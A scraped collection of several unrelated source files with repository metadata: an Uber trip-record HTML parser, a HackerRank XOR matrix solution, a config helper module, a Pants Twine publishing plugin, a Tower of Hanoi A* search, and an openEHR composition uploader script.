self.search="small text-uber-white"
search_length=len(self.search)
c=0
for i in range(0, len((self.file))-search_length): # for total counting part
substr = self.file[i:i+search_length]
if self.search == substr:
c = c + 1
if c == 3: # got the total time of the day
self.time_total = self.file[i+search_length+2: i+search_length+12]
if c==4: # got the total distance of the day
self.distance_total = self.file[i+search_length+2:i+search_length+7] + " km"
if c==5: # got the total cash collection
self.cash_collection_total = self.file[i+search_length+2:i+search_length+10]
if c==6: # got the total earnings
self.earnings_total = self.file[i+search_length+2: i+search_length+10]
break
#print(self.time_total + self.distance_total + self.cash_collection_total + self.earnings_total)
self.search='<p class="portable-soft-huge--right submenu__item__link layout cursor--pointer"><span class="layout__item portable-one-half one-half">' # first day
search_length=len(self.search)
c=0
day=""
#collection=database[day]
day_last_left=0
for i in range(0, len((self.file))-search_length): # counting individual trip of that day.
substr = self.file[i:i+search_length]
if self.search == substr:
trip_number=-1
pos=i
pos_span_ending=0
ending_span=""
for oo in range(1, 1000):
ss=self.file[pos + oo: pos+oo+7]
if ss=="</span>":
pos_span_ending=pos+oo
c = c + 1 # day count
day = self.file[i+search_length+1:pos_span_ending+1]
s_trip_start='<span class="trip-list__date layout__item one-quarter">'
s_trip_time='<span class="trip-list__duration layout__item one-quarter">'
s_trip_distance='<span class="trip-list__distance layout__item one-quarter"'
s_trip_earning='<span class="soft-tiny--left"'
span_endings='</span>'
s_trip_start_l=len(s_trip_start)
s_trip_time_l=len(s_trip_time)
s_trip_distance_l=len(s_trip_distance)
s_trip_earning_l=len(s_trip_earning)
e_trip_start=0
e_trip_time=0
e_trip_distance=0
e_trip_earning=0
check=2
trip_number = trip_number + 1
# trip time
for r in range(e_trip_time, len(self.file)- s_trip_time_l):
t = self.file[ e_trip_time + r : e_trip_time + r + s_trip_time_l ]
check=2
if t == s_trip_time:
start = r + s_trip_time_l +1
for m in range(1,100): # trip time findings
now=self.file[r+m: r+m+7]
if now==span_endings:
e_trip_time=r+m+7
self.trip_time=self.file[start : e_trip_time + 1 ]
check=0
break
if trip_number==0:
continue
if check==0:
check=2
break
# trip start time
for r in range(e_trip_start, len(self.file)- s_trip_start_l):
t = self.file[ e_trip_start + r : e_trip_start + r + s_trip_start_l ]
check=2
if t == s_trip_start:
start = r + s_trip_start_l +1
for m in range(1,100): # trip time findings
now=self.file[r+m: r+m+7]
if now==span_endings:
e_trip_start=r+m+7
self.trip_start=self.file[start : e_trip_start + 1 ]
check=0
break
if trip_number==0:
continue
if check==0:
check=2
break
#trip distance
for r in range(e_trip_distance, len(self.file)- s_trip_distance_l):
t = self.file[ e_trip_distance + r : e_trip_distance + r + s_trip_distance_l ]
check=2
if t== s_trip_distance:
start = r + s_trip_distance_l +1
for m in range(1,100): # trip time findings
now=self.file[r+m: r+m+7]
if now==span_endings:
e_trip_distance=r+m+7
self.trip_distance=self.file[start : e_trip_distance + 1 ]
check=0
break
if trip_number==0:
continue
if check==0:
check=2
break
# trip earnings
for r in range(e_trip_earning, len(self.file)- s_trip_earning_l):
t = self.file[ e_trip_earning + r : e_trip_earning + r + s_trip_earning_l ]
check=2
if t==s_trip_earning:
start = r + s_trip_earning_l +1
for m in range(1,100): # trip time findings
now=self.file[r+m: r+m+7]
if now==span_endings:
e_trip_earning=r+m+7
self.trip_earning=self.file[start : e_trip_earning + 1 ]
check=0
break
if trip_number==0:
continue
if check==0:
check=2
break
# completed trips calcultaion for one trip.
print("Day "+day)
print("Trip number "+str(trip_number))
print("Trip starting "+self.trip_start)
print("Trip time "+self.trip_time)
print("Trip distance "+self.trip_distance)
print("Trip earnings "+self.trip_earning)
object= Data_extraction_creation()
object.getting_source()
|
Harkishen-Singh/Uber-App-Record-Analysis
|
creating databasse copy.py
|
creating databasse copy.py
|
py
| 7,444 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21892483057
|
#!/bin/python3
import os
import sys
#
# Complete the xorMatrix function below.
#
#define GET_BIT(x, bit) (((x)>>(bit)) & 1ULL)
def xorMatrix(m, first_row):
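    # Added explanation: one step of the recurrence maps row[i] to
    # row[i] ^ row[(i + 1) % n]. Applying that step 2**j times is equivalent to
    # XOR-ing with the element 2**j positions ahead (binomial coefficients mod 2),
    # so decomposing m - 1 into powers of two advances the matrix by m - 1 rows
    # in O(64 * n) work instead of simulating every intermediate row.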
m = m - 1
for j in range(63, -1, -1):
if((m>>j) & 1 == 1):
intialRow = first_row.copy()
for i in range(0, len(first_row)):
first_row[i] ^= intialRow[(i + (1<<j)) % len(first_row)];
return first_row
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nm = input().split()
n = int(nm[0])
m = int(nm[1])
first_row = list(map(int, input().rstrip().split()))
last_row = xorMatrix(m, first_row)
fptr.write(' '.join(map(str, last_row)))
fptr.write('\n')
fptr.close()
|
shady236/HackerRank-Solutions
|
Algorithms/XOR Matrix/XOR Matrix.py
|
XOR Matrix.py
|
py
| 803 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29381018111
|
import copy
import tempfile
import yaml
import re
import os
import constellation.vault as vault
from constellation.util import ImageReference
def read_yaml(filename):
with open(filename, "r") as f:
dat = yaml.load(f, Loader=yaml.SafeLoader)
dat = parse_env_vars(dat)
return dat
def config_build(path, data, extra=None, options=None):
data = copy.deepcopy(data)
if extra:
data_extra = read_yaml("{}/{}.yml".format(path, extra))
config_check_additional(data_extra)
combine(data, data_extra)
if options:
if isinstance(options, list):
options = collapse(options)
config_check_additional(options)
combine(data, options)
return data
# Utility function for centralising control over pulling information
# out of the configuration.
def config_value(data, path, data_type, is_optional, default=None):
if type(path) is str:
path = [path]
for i, p in enumerate(path):
try:
data = data[p]
if data is None:
raise KeyError()
except KeyError as e:
if is_optional:
return default
e.args = (":".join(path[:(i + 1)]),)
raise e
expected = {"string": str,
"integer": int,
"boolean": bool,
"dict": dict,
"list": list}
if type(data) is not expected[data_type]:
raise ValueError("Expected {} for {}".format(
data_type, ":".join(path)))
return data
# TODO: This can be made better with respect to optional values (e.g.,
# if url is present other keys are required).
def config_vault(data, path):
url = config_string(data, path + ["addr"], True)
auth_method = config_string(data, path + ["auth", "method"], True)
auth_args = config_dict(data, path + ["auth", "args"], True)
return vault.vault_config(url, auth_method, auth_args)
def config_string(data, path, is_optional=False, default=None):
return config_value(data, path, "string", is_optional, default)
def config_integer(data, path, is_optional=False, default=None):
return config_value(data, path, "integer", is_optional, default)
def config_boolean(data, path, is_optional=False, default=None):
return config_value(data, path, "boolean", is_optional, default)
def config_dict(data, path, is_optional=False, default=None):
return config_value(data, path, "dict", is_optional, default)
def config_dict_strict(data, path, keys, is_optional=False, default=None):
d = config_dict(data, path, is_optional)
if not d:
return default
if set(keys) != set(d.keys()):
raise ValueError("Expected keys {} for {}".format(
", ".join(keys), ":".join(path)))
for k, v in d.items():
if type(v) is not str:
raise ValueError("Expected a string for {}".format(
":".join(path + [k])))
return d
def config_list(data, path, is_optional=False, default=None):
return config_value(data, path, "list", is_optional, default)
def config_enum(data, path, values, is_optional=False, default=None):
value = config_string(data, path, is_optional, default)
if value not in values:
raise ValueError("Expected one of [{}] for {}".format(
", ".join(values), ":".join(path)))
return value
def config_image_reference(dat, path, name="name"):
if type(path) is str:
path = [path]
repo = config_string(dat, path + ["repo"])
name = config_string(dat, path + [name])
tag = config_string(dat, path + ["tag"])
return ImageReference(repo, name, tag)
def config_check_additional(options):
if "container_prefix" in options:
raise Exception("'container_prefix' may not be modified")
def combine(base, extra):
"""Combine exactly two dictionaries recursively, modifying the first
    argument in place with the contents of the second"""
for k, v in extra.items():
if k in base and type(base[k]) is dict and v is not None:
combine(base[k], v)
else:
base[k] = v
def collapse(options):
"""Combine a list of dictionaries recursively, combining from left to
right so that later dictionaries override values in earlier ones"""
ret = {}
for o in options:
combine(ret, o)
return ret
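# Illustrative example (values invented for this note):
#   combine({"a": {"x": 1}, "b": 2}, {"a": {"y": 3}})
#   leaves the first dict as {"a": {"x": 1, "y": 3}, "b": 2}, while
#   collapse([{"a": 1}, {"a": 2, "b": 3}]) returns {"a": 2, "b": 3},
#   since later dictionaries override earlier ones.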
def parse_env_vars(data):
if isinstance(data, (dict, list)):
for k, v in (data.items() if isinstance(data, dict)
else enumerate(data)):
if isinstance(v, (dict, list)):
data[k] = parse_env_vars(v)
if isinstance(v, str) and re.search("^\\$[0-9A-Z_]+$", v):
data[k] = get_envvar(v[1:])
return data
def get_envvar(name):
try:
return os.environ[name]
except KeyError:
raise KeyError("Did not find env var '{}'".format(
name))
|
reside-ic/constellation
|
constellation/config.py
|
config.py
|
py
| 4,914 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10252651311
|
from secuenciales.colaprioridad import *
from secuenciales.pila import Pila
import copy
class nodoGrafo:
def __init__(self, nodo_padre, torreA, torreB, torreC):
self.torreA = torreA
self.torreB = torreB
self.torreC = torreC
self.padre = nodo_padre
self.nivel = self.calcularNivelNodo()
self.funcion_heuristica = self.CalcularFuncionHeuristica()
def calcularNivelNodo(self):
if self.padre is not None:
return self.padre.nivel + 1
else:
return 0
def calcularFuncionHeuristicaTorre(self, torre, idTorre):
iteracion = 0
aux_disco = 0
valor_heuristico_torre = 0
if len(torre) > 0:
for disco in torre:
if iteracion == 0:
aux_disco = disco
iteracion += 1
elif aux_disco < disco:
if idTorre == "A": valor_heuristico_torre += 1
if idTorre == "B": valor_heuristico_torre += 15
if idTorre == "C": valor_heuristico_torre += 10
aux_disco = disco
elif aux_disco > disco:
valor_heuristico_torre -= 1000
if idTorre == "A": valor_heuristico_torre += 1
if idTorre == "B": valor_heuristico_torre += 15
if idTorre == "C": valor_heuristico_torre += 10
return valor_heuristico_torre
def CalcularFuncionHeuristica(self):
valor_heuristico = 0
valor_heuristico += self.calcularFuncionHeuristicaTorre(self.torreA, "A")
valor_heuristico += self.calcularFuncionHeuristicaTorre(self.torreB, "B")
valor_heuristico += self.calcularFuncionHeuristicaTorre(self.torreC, "C")
if len(self.torreC) > 0:
actual = 0
for disco in self.torreC:
actual = disco
if actual == 4:
valor_heuristico += 15
if actual == 3:
valor_heuristico += 10
if actual == 2:
valor_heuristico += 5
if actual == 1:
valor_heuristico += 1
if self.nivel > 15:
valor_heuristico -= 15
return valor_heuristico - self.nivel
def convertirEnLista(self, torre):
auxTorre = copy.deepcopy(torre)
lista = []
if len(auxTorre) > 0:
for disco in auxTorre:
lista.append(disco)
auxTorre.desapilar()
return lista
def generarEstadosSucesores(self):
lista_sucesores = []
if not (self.torreA.cima() is None):
lista_sucesores += self.generarSucesores("A")
if not (self.torreB.cima() is None):
lista_sucesores += self.generarSucesores("B")
if not (self.torreC.cima() is None):
lista_sucesores += self.generarSucesores("C")
return lista_sucesores
def generarSucesores(self, idTorre):
if idTorre == "A":
lista_sucesoresA = []
copia_estado1 = copy.deepcopy(self)
copia_estado2 = copy.deepcopy(self)
copia_estado1.torreB.apilar(copia_estado1.torreA.cima())
copia_estado1.torreA.desapilar()
self.recalcularParametros(copia_estado1)
lista_sucesoresA.append(copia_estado1)
copia_estado2.torreC.apilar(copia_estado2.torreA.cima())
copia_estado2.torreA.desapilar()
self.recalcularParametros(copia_estado2)
lista_sucesoresA.append(copia_estado2)
return lista_sucesoresA
if idTorre == "B":
lista_sucesoresB = []
copia_estado1 = copy.deepcopy(self)
copia_estado2 = copy.deepcopy(self)
copia_estado1.torreA.apilar(copia_estado1.torreB.cima())
copia_estado1.torreB.desapilar()
self.recalcularParametros(copia_estado1)
lista_sucesoresB.append(copia_estado1)
copia_estado2.torreC.apilar(copia_estado2.torreB.cima())
copia_estado2.torreB.desapilar()
self.recalcularParametros(copia_estado2)
lista_sucesoresB.append(copia_estado2)
return lista_sucesoresB
if idTorre == "C":
lista_sucesoresC = []
copia_estado1 = copy.deepcopy(self)
copia_estado2 = copy.deepcopy(self)
copia_estado1.torreB.apilar(copia_estado1.torreC.cima())
copia_estado1.torreC.desapilar()
self.recalcularParametros(copia_estado1)
lista_sucesoresC.append(copia_estado1)
copia_estado2.torreA.apilar(copia_estado2.torreC.cima())
copia_estado2.torreC.desapilar()
self.recalcularParametros(copia_estado2)
lista_sucesoresC.append(copia_estado2)
return lista_sucesoresC
def recalcularParametros(self, estado):
estado.padre = self
estado.nivel = estado.calcularNivelNodo()
estado.funcion_heuristica = estado.CalcularFuncionHeuristica()
def __eq__(self, other) -> bool:
if self.convertirEnLista(self.torreA) == self.convertirEnLista(other.torreA) and self.convertirEnLista(self.torreB) == self.convertirEnLista(other.torreB) and self.convertirEnLista(self.torreC) == self.convertirEnLista(other.torreC):
return True
return False
def __str__(self) -> str:
estado = ""
for disco in reversed(self.convertirEnLista(self.torreA)):
estado += str(disco) + " "
estado += "\n"
for disco in reversed(self.convertirEnLista(self.torreB)):
estado += str(disco) + " "
estado += "\n"
for disco in reversed(self.convertirEnLista(self.torreC)):
estado += str(disco) + " "
estado += "\n"
estado += "FH = " + str(self.funcion_heuristica)
return estado
def backtracking(self, list_solucion):
list_solucion.append(self)
if self.padre is not None:
return self.padre.backtracking(list_solucion)
else:
return 0
def inAbiertos(abiertos, estado):
flag = False
for abierto in abiertos:
if abierto.dato.__eq__(estado):
flag = True
break
return flag
if __name__ == "__main__":
abiertos = Colaprioridad()
cerrados = []
torreA = Pila()
torreA.apilar(4)
torreA.apilar(3)
torreA.apilar(2)
torreA.apilar(1)
torreB = Pila()
torreC = Pila()
torreAo = Pila()
torreBo = Pila()
torreCo = Pila()
torreCo.apilar(4)
torreCo.apilar(3)
torreCo.apilar(2)
torreCo.apilar(1)
estado_inicial = nodoGrafo(None, torreA, torreB, torreC)
estado_objetivo = nodoGrafo(None, torreAo, torreBo, torreCo)
abiertos.encolar(estado_inicial, estado_inicial.funcion_heuristica)
estado_actual = estado_inicial
iteraciones = 0
while not (estado_actual.__eq__(estado_objetivo)) and len(abiertos) > 0:
estado_actual = abiertos.desencolar().dato
# print(estado_actual)
# print("=======================")
sucesores = estado_actual.generarEstadosSucesores()
for estado in sucesores:
if not inAbiertos(abiertos, estado) and estado not in cerrados:
abiertos.encolar(estado, estado.funcion_heuristica)
cerrados.append(estado_actual)
iteraciones += 1
if estado_actual.__eq__(estado_objetivo):
        print("Success")
        print("Level: " + str(estado_actual.nivel))
        print("Iterations: " + str(iteraciones))
list_solucion = []
estado_actual.backtracking(list_solucion)
for solucion in reversed(list_solucion):
print("=======================")
print(solucion)
else:
        print("Could not find a solution")
|
difer19/Estructuras-de-Datos
|
GrafosA_Star.py
|
GrafosA_Star.py
|
py
| 7,942 |
python
|
es
|
code
| 0 |
github-code
|
6
|
26040958016
|
from __future__ import annotations
import logging
from dataclasses import dataclass
from pants.backend.python.subsystems.twine import TwineSubsystem
from pants.backend.python.target_types import PythonDistribution
from pants.backend.python.util_rules.pex import PexRequest, VenvPex, VenvPexProcess
from pants.core.goals.publish import (
PublishFieldSet,
PublishOutputData,
PublishPackages,
PublishProcesses,
PublishRequest,
)
from pants.core.util_rules.config_files import ConfigFiles, ConfigFilesRequest
from pants.engine.env_vars import EnvironmentVars, EnvironmentVarsRequest
from pants.engine.fs import CreateDigest, Digest, MergeDigests, Snapshot
from pants.engine.process import InteractiveProcess, Process
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import BoolField, StringSequenceField
from pants.option.global_options import GlobalOptions
from pants.util.strutil import help_text
logger = logging.getLogger(__name__)
class PythonRepositoriesField(StringSequenceField):
alias = "repositories"
help = help_text(
"""
List of URL addresses or Twine repository aliases where to publish the Python package.
Twine is used for publishing Python packages, so the address to any kind of repository
that Twine supports may be used here.
Aliases are prefixed with `@` to refer to a config section in your Twine configuration,
such as a `.pypirc` file. Use `@pypi` to upload to the public PyPi repository, which is
the default when using Twine directly.
"""
)
# Twine uploads to 'pypi' by default, but we don't set default to ["@pypi"] here to make it
# explicit in the BUILD file when a package is meant for public distribution.
class SkipTwineUploadField(BoolField):
alias = "skip_twine"
default = False
help = "If true, don't publish this target's packages using Twine."
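# Rough sketch of how these plugin fields can appear on a `python_distribution`
# target in a BUILD file (target name, artifact metadata and repository alias
# are illustrative, not taken from this repository):
#
#   python_distribution(
#       name="example-dist",
#       provides=python_artifact(name="example", version="0.0.1"),
#       repositories=["@pypi"],
#       skip_twine=False,
#   )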
class PublishPythonPackageRequest(PublishRequest):
pass
@dataclass(frozen=True)
class PublishPythonPackageFieldSet(PublishFieldSet):
publish_request_type = PublishPythonPackageRequest
required_fields = (PythonRepositoriesField,)
repositories: PythonRepositoriesField
skip_twine: SkipTwineUploadField
def get_output_data(self) -> PublishOutputData:
return PublishOutputData(
{
"publisher": "twine",
**super().get_output_data(),
}
)
# I'd rather opt out early here, so we don't build unnecessarily, however the error feedback is
# misleading and not very helpful in that case.
#
# @classmethod
# def opt_out(cls, tgt: Target) -> bool:
# return not tgt[PythonRepositoriesField].value
def twine_upload_args(
twine_subsystem: TwineSubsystem,
config_files: ConfigFiles,
repo: str,
dists: tuple[str, ...],
ca_cert: Snapshot | None,
) -> tuple[str, ...]:
args = ["upload", "--non-interactive"]
if ca_cert and ca_cert.files:
args.append(f"--cert={ca_cert.files[0]}")
if config_files.snapshot.files:
args.append(f"--config-file={config_files.snapshot.files[0]}")
args.extend(twine_subsystem.args)
if repo.startswith("@"):
# Named repository from the config file.
args.append(f"--repository={repo[1:]}")
else:
args.append(f"--repository-url={repo}")
args.extend(dists)
return tuple(args)
def twine_env_suffix(repo: str) -> str:
return f"_{repo[1:]}".replace("-", "_").upper() if repo.startswith("@") else ""
def twine_env_request(repo: str) -> EnvironmentVarsRequest:
suffix = twine_env_suffix(repo)
env_vars = [
"TWINE_USERNAME",
"TWINE_PASSWORD",
"TWINE_REPOSITORY_URL",
]
req = EnvironmentVarsRequest(env_vars + [f"{var}{suffix}" for var in env_vars])
return req
def twine_env(env: EnvironmentVars, repo: str) -> EnvironmentVars:
suffix = twine_env_suffix(repo)
return EnvironmentVars(
{key.rsplit(suffix, maxsplit=1)[0] if suffix else key: value for key, value in env.items()}
)
@rule
async def twine_upload(
request: PublishPythonPackageRequest,
twine_subsystem: TwineSubsystem,
global_options: GlobalOptions,
) -> PublishProcesses:
dists = tuple(
artifact.relpath
for pkg in request.packages
for artifact in pkg.artifacts
if artifact.relpath
)
if twine_subsystem.skip or not dists:
return PublishProcesses()
# Too verbose to provide feedback as to why some packages were skipped?
skip = None
if request.field_set.skip_twine.value:
skip = f"(by `{request.field_set.skip_twine.alias}` on {request.field_set.address})"
elif not request.field_set.repositories.value:
# I'd rather have used the opt_out mechanism on the field set, but that gives no hint as to
# why the target was not applicable..
skip = f"(no `{request.field_set.repositories.alias}` specified for {request.field_set.address})"
if skip:
return PublishProcesses(
[
PublishPackages(
names=dists,
description=skip,
),
]
)
twine_pex, packages_digest, config_files = await MultiGet(
Get(VenvPex, PexRequest, twine_subsystem.to_pex_request()),
Get(Digest, MergeDigests(pkg.digest for pkg in request.packages)),
Get(ConfigFiles, ConfigFilesRequest, twine_subsystem.config_request()),
)
ca_cert_request = twine_subsystem.ca_certs_digest_request(global_options.ca_certs_path)
ca_cert = await Get(Snapshot, CreateDigest, ca_cert_request) if ca_cert_request else None
ca_cert_digest = (ca_cert.digest,) if ca_cert else ()
input_digest = await Get(
Digest, MergeDigests((packages_digest, config_files.snapshot.digest, *ca_cert_digest))
)
pex_proc_requests = []
twine_envs = await MultiGet(
Get(EnvironmentVars, EnvironmentVarsRequest, twine_env_request(repo))
for repo in request.field_set.repositories.value
)
for repo, env in zip(request.field_set.repositories.value, twine_envs):
pex_proc_requests.append(
VenvPexProcess(
twine_pex,
argv=twine_upload_args(twine_subsystem, config_files, repo, dists, ca_cert),
input_digest=input_digest,
extra_env=twine_env(env, repo),
description=repo,
)
)
processes = await MultiGet(
Get(Process, VenvPexProcess, request) for request in pex_proc_requests
)
return PublishProcesses(
PublishPackages(
names=dists,
process=InteractiveProcess.from_process(process),
description=process.description,
data=PublishOutputData({"repository": process.description}),
)
for process in processes
)
def rules():
return (
*collect_rules(),
*PublishPythonPackageFieldSet.rules(),
PythonDistribution.register_plugin_field(PythonRepositoriesField),
PythonDistribution.register_plugin_field(SkipTwineUploadField),
)
|
pantsbuild/pants
|
src/python/pants/backend/python/goals/publish.py
|
publish.py
|
py
| 7,218 |
python
|
en
|
code
| 2,896 |
github-code
|
6
|
24957977468
|
#!/usr/bin/python3
'''Post the compositions in a given directory filtered or not by a basename
now one ehr per composition
'''
import json
import logging
import requests
from url_normalize import url_normalize
import sys
import argparse
import os
from typing import Any,Callable
import re
from json_tools import diff
import collections
import uuid
def compare(firstjson: dict, secondjson: dict) -> str:
'''
compare the given jsons
'''
one=flatten(firstjson)
two=flatten(secondjson)
return json.dumps((diff(one,two)),indent=4)
def change_naming(myjson: dict) -> dict:
'''change naming convention on the json'''
return change_dict_naming_convention(myjson,convertcase)
def flatten(d:dict, parent_key:str='', sep:str='_')->dict:
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.abc.MutableMapping):
items.extend(flatten(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
return dict(items)
def change_dict_naming_convention(d:Any, convert_function:Callable[[str],str])->dict:
"""
Convert a nested dictionary from one convention to another.
Args:
d (dict): dictionary (nested or not) to be converted.
convert_function (func): function that takes the string in one convention and returns it in the other one.
Returns:
Dictionary with the new keys.
"""
if not isinstance(d,dict):
return d
new = {}
for k, v in d.items():
new_v = v
if isinstance(v, dict):
new_v = change_dict_naming_convention(v, convert_function)
elif isinstance(v, list):
new_v = list()
for x in v:
new_v.append(change_dict_naming_convention(x, convert_function))
new[convert_function(k)] = new_v
return new
def convertcase(name:str)->str:
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
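# Illustrative example (keys invented for this note): convertcase("startTime")
# returns "start_time", so change_dict_naming_convention({"caseId": {"startTime": 1}},
# convertcase) yields {"case_id": {"start_time": 1}}, recursing into nested
# dicts and lists while leaving other values untouched.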
def analyze_comparison(comparison_results:list)->int:
ndifferences=0
for l in comparison_results:
if "add" in l:
if("_uid" in l['add']): #ignore if it is _uid
continue
else:
ndifferences+=1
logging.debug(f"difference add:{l['add']} value={l['value']}")
elif "remove" in l:
ndifferences+=1
logging.debug(f"difference remove:{l['remove']} value={l['value']}")
elif "replace" in l:
if(l['replace'].endswith("time")):
if(l['value'][:18]==l['prev'][:18]):
continue
ndifferences+=1
logging.debug(f"difference replace:{l['replace']} value={l['value']} prev={l['prev']}")
elif(l['value'].startswith('P') and l['value'].endswith('D')):
continue
else:
ndifferences+=1
logging.debug(f"difference replace:{l['replace']} value={l['value']} prev={l['prev']}")
return ndifferences
def create_ehr(client,EHR_SERVER_BASE_URL, auth,patientid):
logging.debug('----POST EHR----')
body1='''
{
"_type" : "EHR_STATUS",
"name" : {
"_type" : "DV_TEXT",
"value" : "EHR Status"
},
"subject" : {
"_type" : "PARTY_SELF",
"external_ref" : {
"_type" : "PARTY_REF",
"namespace" : "BBMRI",
"type" : "PERSON",
"id" : {
"_type" : "GENERIC_ID",
'''
body2=f' "value" : "{patientid}",'
body3='''
"scheme" : "BBMRI"
}
}
},
"archetype_node_id" : "openEHR-EHR-EHR_STATUS.generic.v1",
"is_modifiable" : true,
"is_queryable" : true
}
'''
body=body1+body2+body3
logging.debug(f'body={body}')
# sys.exit(0)
ehrs = client.post(EHR_SERVER_BASE_URL + 'ehr', \
params={},headers={'Authorization':auth,'Content-Type':'application/JSON','Accept': 'application/json','Prefer': 'return={representation|minimal}'},\
data=body)
print(f'create ehr status_code={ehrs.status_code}')
logging.info(f'create ehr: status_code={ehrs.status_code}')
logging.debug(f'ehr url={ehrs.url}')
logging.debug(f'ehrs.headers={ehrs.headers}')
logging.debug(f'ehrs.text={ehrs.text}')
logging.debug(f'ehrs.json={ehrs.json}')
if(ehrs.status_code==409 and 'Specified party has already an EHR set' in json.loads(ehrs.text)['message']):
#get ehr summary by subject_id , subject_namespace
payload = {'subject_id':patientid,'subject_namespace':'BBMRI'}
ehrs = client.get(EHR_SERVER_BASE_URL + 'ehr', params=payload,headers={'Authorization':auth,'Content-Type':'application/JSON','Accept': 'application/json'})
print('ehr already existent')
logging.info('ehr already existent')
logging.debug('----GET EHR----')
print(f'get ehr: status_code={ehrs.status_code}')
logging.info(f'get ehr: status_code={ehrs.status_code}')
logging.debug(f'ehr url={ehrs.url}')
logging.debug(f'ehr.headers={ehrs.headers}')
logging.debug(f'ehr.text={ehrs.text}')
logging.debug(f'ehr.json={ehrs.json}')
ehrid=json.loads(ehrs.text)["ehr_id"]["value"]
print(f'Patient {patientid}: retrieved ehrid={ehrid}')
logging.info(f'Patient {patientid}: retrieved ehrid={ehrid}')
return ehrid
# print(f'ehrheaders={ehrs.headers}')
urlehrstring = ehrs.headers['Location']
ehridstring = "{"+urlehrstring.split("v1/ehr/",2)[2]
ehrid=uuid.UUID(ehridstring)
print(f'Patient {patientid}: ehrid={str(ehrid)}')
logging.info(f'Patient {patientid}: ehrid={str(ehrid)}')
return ehrid
def main():
print('COMPOSITIONS UPLOADER')
parser = argparse.ArgumentParser()
parser.add_argument('--loglevel',help='the logging level:DEBUG,INFO,WARNING,ERROR or CRITICAL',default='WARNING')
parser.add_argument('--inputdir',help='dir containing the compositions',default='RESULTS')
parser.add_argument('--basename',help='basename to filter compositions')
parser.add_argument('--templatename',help='template to use when posting',default='crc_cohort')
parser.add_argument('--check',action='store_true', help='check the missing leafs for leafs that should be there but are not')
args=parser.parse_args()
loglevel=getattr(logging, args.loglevel.upper(),logging.WARNING)
if not isinstance(loglevel, int):
raise ValueError('Invalid log level: %s' % loglevel)
logging.basicConfig(filename='./CompositionUploader.log',filemode='w',level=loglevel)
inputdir=args.inputdir
print(f'inputdir given: {inputdir}')
logging.info(f'inputdir given: {inputdir}')
if not os.path.exists(inputdir):
print(f'directory {inputdir} does not exist')
logging.error(f'directory {inputdir} does not exist')
sys.exit(1)
basename=args.basename
if(basename):
logging.info(f'basename given: {basename}')
print(f'basename given: {basename}')
check=False
if args.check:
check=True
print ('Check is set to true')
logging.info('Check is set to true')
#get the list of files
filelist=[]
if basename:
for file in os.listdir(inputdir):
if file.startswith(basename) and file.endswith(".json"):
logging.debug(f'file added {os.path.join(inputdir, file)}')
filelist.append(file)
else:
for file in os.listdir(inputdir):
if file.endswith(".json"):
logging.debug(f'file added {os.path.join(inputdir, file)}')
filelist.append(file)
# Now sort the list
filelist.sort(key=lambda a: int(a.split('_')[1]))
for i,f in enumerate(filelist):
logging.info(f'file {i+1} = {f}')
# Initialize the connection to ehrbase
EHR_SERVER_BASE_URL = 'http://localhost:8080/ehrbase/rest/openehr/v1/'
EHR_SERVER_BASE_URL_FLAT = 'http://localhost:8080/ehrbase/rest/ecis/v1/composition/'
client = requests.Session()
client.auth = ('ehrbase-user','SuperSecretPassword')
auth="Basic ZWhyYmFzZS11c2VyOlN1cGVyU2VjcmV0UGFzc3dvcmQ="
nfiles=len(filelist)
print(f'{nfiles} to insert')
logging.info(f'{nfiles} to insert')
#check if the template is already in the db
templatename=args.templatename
myurl=url_normalize(EHR_SERVER_BASE_URL + 'definition/template/adl1.4')
response = client.get(myurl,params={'format': 'JSON'},headers={'Authorization':auth,'Content-Type':'application/JSON'})
templates=[a["template_id"] for a in json.loads(response.text)]
if(templatename not in templates):
print(f'Missing template {templatename}')
logging.error(f'Missing template {templatename}')
sys.exit(1)
# loop over files and upload the compositions
myurl=url_normalize(EHR_SERVER_BASE_URL_FLAT)
compinserted=0
compok=0
for i,file in enumerate(filelist):
print(f'********FILE {i+1}/{nfiles} {file}********')
logging.info(f'********FILE {i+1}/{nfiles} {file}********')
filename=os.path.join(inputdir, file)
with open(filename) as json_file:
compositionjson = json.load(json_file)
patientid='Patient'+compositionjson[templatename.lower()+'/context/case_identification/patient_pseudonym']
print(f'Patientid={patientid}')
logging.info(f'Patientid={patientid}')
# create ehr
ehrid=create_ehr(client,EHR_SERVER_BASE_URL, auth,patientid)
# post composition
compositionjson=json.dumps(compositionjson)
response = client.post(myurl,
params={'ehrId':str(ehrid),'templateId':templatename,'format':'FLAT'}, \
headers={'Authorization':auth,'Content-Type':'application/json','Prefer':'return=representation'}, \
data=compositionjson \
)
if(response.status_code != 200 and response.status_code != 201):
print(f"Couldn't post the composition. Error={response.status_code}")
print(f'response.text {response.text}')
logging.info(f"Couldn't post the composition. Error={response.status_code}")
logging.info(f'response.headers {response.headers}')
logging.info(f'response.text {response.text}')
else:
compinserted+=1
print(f'Composition inserted')
compositionUid=json.loads(response.text)["compositionUid"]
print(f'compositionUid={compositionUid}')
logging.info(f'compositionUid={compositionUid}')
if(check):
print(f'checking...')
logging.info(f'checking...')
#get composition created and compare with the one posted
myurlu=url_normalize(EHR_SERVER_BASE_URL_FLAT+compositionUid)
response = client.get(myurlu, \
params={'ehrId':str(ehrid),'templateId':templatename,'format':'FLAT'}, \
headers={'Authorization':auth,'Content-Type':'application/json'}, \
)
if(response.status_code != 200 and response.status_code != 201):
print(f"Couldn't retrieve the composition. Error{response.status_code}")
logging.info(f"Couldn't retrieve the composition. Error{response.status_code}")
logging.info(f'response.headers {response.headers}')
logging.info(f'response.text {response.text}')
else:
origjson=json.loads(compositionjson)
retrievedjson=json.loads(response.text)["composition"]
origchanged=change_naming(origjson)
retrchanged=change_naming(retrievedjson)
comparison_results=compare(origchanged,retrchanged)
ndiff=analyze_comparison(comparison_results)
if(ndiff>0):
print('original and retrieved json differ')
logging.info('original and retrieved json differ')
logging.debug(f'comparison_results:')
logging.debug(comparison_results)
else:
print('original and retrieved json do not differ')
logging.info('original and retrieved json do not differ')
compok+=1
print(f'{compinserted}/{nfiles} compositions inserted successfully')
